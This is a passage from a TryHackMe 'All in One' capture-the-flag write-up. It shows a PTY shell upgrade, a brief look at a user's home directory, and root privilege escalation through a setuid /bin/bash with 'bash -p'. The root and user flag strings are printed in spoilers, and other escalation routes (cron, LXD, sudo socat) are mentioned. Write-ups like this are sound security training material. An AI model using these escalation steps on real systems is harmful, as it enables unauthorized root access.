bash-4.4$ export SHELL=bash
bash-4.4$ python3 -c 'import pty;pty.spawn("/bin/bash")'
```

## System enumeration

```
bash-4.4$ ls -lh /home/elyana
total 8.0K
-rw-rw-r-- 1 elyana elyana 59 Oct  6 20:24 hint.txt
-rw------- 1 elyana elyana 61 Oct  6 20:28 user.txt

bash-4.4$ cat /home/elyana/hint.txt
Elyana's user password is hidden in the system. Find it ;)
```

## Unintended root EoP

We can bypass all the system enumeration and EoP because of the SGID on bash
that let's start a shell as root (euid):

```
$ bash-4.4$ ls -lh /bin/bash
-rwsr-sr-x 1 root root 1.1M Jun  6  2019 /bin/bash

bash-4.4$ bash -p

bash-4.4# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

bash-4.4# cat /root/root.txt | base64 -d

bash-4.4# cat /home/elyana/user.txt | base64 -d
```

- `root.txt`: {% spoiler `THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}` %}
- `user.txt`: {% spoiler `THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}` %}

PS: there was also a `/var/backups/script.sh` used by cron to EoP as root directly.
There were two other methods one with LXD and the intended solution where you had
to find the elyana creds in a file and then abuse socat with sudo
(see the [official WU](https://i7m4d.medium.com/all-in-one-tryhackme-write-up-303eaa2caa8)).
